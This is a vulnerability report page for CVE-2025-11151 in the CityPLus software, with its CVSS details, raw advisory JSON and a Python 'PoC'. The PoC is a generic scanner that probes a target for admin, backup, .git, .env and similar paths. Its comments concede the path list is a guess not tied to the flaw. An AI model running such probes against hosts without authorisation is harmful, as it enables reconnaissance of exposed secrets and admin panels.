Security Vulnerability Report
CVE-2025-11151 CVSS 8.2 HIGH

CVE-2025-11151

Published: 2025-10-21 14:15:47
Last Modified: 2026-04-15 00:35:42

Description

Exposure of Sensitive Information to an Unauthorized Actor, Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Beyaz Bilgisayar Software Design Industry and Trade Ltd. Co. CityPLus allows Detect Unpublicized Web Pages. This issue affects CityPLus: before V24.29500.1.0.

CVSS Details

CVSS Score
8.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

No configuration data available.

CityPLus < V24.29500.1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
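# CVE-2025-11151 PoC - CityPLus Unpublished Web Page Detection
#
# Requests a fixed list of URL paths on one host and reports which of them
# answer with HTTP 200, 401 or 403.
#
# Review notes:
# - The advisory text for CVE-2025-11151 names no specific path, so
#   HIDDEN_PATHS is a generic guess list, not a signature of the flaw.
#   A response is a lead to verify by hand, not proof that a host is affected.
# - /robots.txt and /sitemap.xml are meant to be public, and a 401 or 403
#   shows that access control answered the request. None of these is an
#   information exposure on its own.
# - A server that answers 200 for every path (for example through a custom
#   error page) makes every entry look "found".
# - For defenders: a run appears in access logs as a short burst of GET
#   requests for the paths below from one client, carrying the User-Agent
#   set in detect_unpublished_pages(). The advisory lists CityPLus versions
#   before V24.29500.1.0 as affected.
import sys
from urllib.parse import urljoin

import requests

# First command-line argument is the base URL; the fallback is a placeholder
# host name, not a real system.
TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "http://target-cityplus-server"

# Generic administrative, diagnostic and configuration paths. Nothing on the
# advisory ties any of them to CityPLus specifically.
HIDDEN_PATHS = [
    "/admin/",
    "/admin/login.aspx",
    "/yonetim/",
    "/yonetim/giris.aspx",
    "/panel/",
    "/internal/",
    "/debug/",
    "/test/",
    "/backup/",
    "/config/",
    "/api/",
    "/api/v1/",
    "/private/",
    "/hidden/",
    "/system/",
    "/management/",
    "/dashboard/",
    "/reports/",
    "/logs/",
    "/temp/",
    "/uploads/",
    "/files/",
    "/db/",
    "/database/",
    "/setup/",
    "/install/",
    "/status/",
    "/health/",
    "/info/",
    "/phpinfo.php",
    "/server-status",
    "/server-info",
    "/.git/",
    "/.env",
    "/web.config",
    "/sitemap.xml",
    "/robots.txt",
]


def detect_unpublished_pages(base_url):
    """Request every path in HIDDEN_PATHS and collect the ones that respond.

    Args:
        base_url: Base URL of the host to check. Every entry in HIDDEN_PATHS
            starts with "/", so urljoin() replaces any path component of
            base_url and each request goes to the site root.

    Returns:
        A list of dicts with the keys "url", "status" and "size", one per
        path that answered 200 with a non-empty body, 401 or 403. "size" is
        the body length for 200 responses and 0 otherwise.
    """
    print(f"[*] Scanning target: {base_url}")
    print("[*] CVE-2025-11151 - CityPLus Unpublished Page Detection")
    print("-" * 60)

    found_pages = []
    failed_requests = 0

    session = requests.Session()
    session.headers.update({
        "User-Agent": "Mozilla/5.0 (compatible; SecurityScanner/1.0)"
    })

    for path in HIDDEN_PATHS:
        url = urljoin(base_url, path)
        try:
            # Redirects are not followed, so a 3xx answer is never recorded.
            response = session.get(url, timeout=10, allow_redirects=False)
        except requests.exceptions.RequestException as exc:
            # Report the failure instead of dropping it: an unreachable host
            # must not end up looking like a clean result.
            failed_requests += 1
            print(f"[-] ERROR: {url} - {type(exc).__name__}")
            continue

        status = response.status_code
        if status == 200:
            body_size = len(response.content)
            # A 200 with an empty body is not recorded.
            if body_size > 0:
                print(f"[+] FOUND: {url} - Status: {status} - Size: {body_size} bytes")
                found_pages.append({"url": url, "status": status, "size": body_size})
        elif status == 403:
            print(f"[!] FORBIDDEN: {url} - Page exists but access denied")
            found_pages.append({"url": url, "status": status, "size": 0})
        elif status == 401:
            print(f"[!] AUTH REQUIRED: {url} - Authentication required")
            found_pages.append({"url": url, "status": status, "size": 0})

    print("-" * 60)
    print(f"[*] Scan complete. Found {len(found_pages)} potentially sensitive pages.")
    if failed_requests:
        print(f"[*] {failed_requests} requests failed; no conclusion for those paths.")

    if found_pages:
        # The responses alone do not establish CVE-2025-11151: the list holds
        # public-by-design files and counts 401/403 answers, so the verdict
        # is left to manual review of each URL.
        print("\n[!] Listed paths responded - review each URL by hand before concluding.")
        print("[!] Affected versions: CityPLus before V24.29500.1.0")

    return found_pages


if __name__ == "__main__":
    results = detect_unpublished_pages(TARGET_URL)

    # Export results
    if results:
        with open("cityplus_exposed_pages.txt", "w", encoding="utf-8") as f:
            f.writelines(
                f"{page['url']} - Status: {page['status']}\n" for page in results
            )
        print("\n[*] Results saved to cityplus_exposed_pages.txt")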

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11151", "sourceIdentifier": "[email protected]", "published": "2025-10-21T14:15:46.583", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exposure of Sensitive Information to an Unauthorized Actor, Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Beyaz Bilgisayar Software Design Industry and Trade Ltd. Co. CityPLus allows Detect Unpublicized Web Pages.This issue affects CityPLus: before V24.29500.1.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-497"}]}], "references": [{"url": "https://www.usom.gov.tr/bildirim/tr-25-0351", "source": "[email protected]"}]}}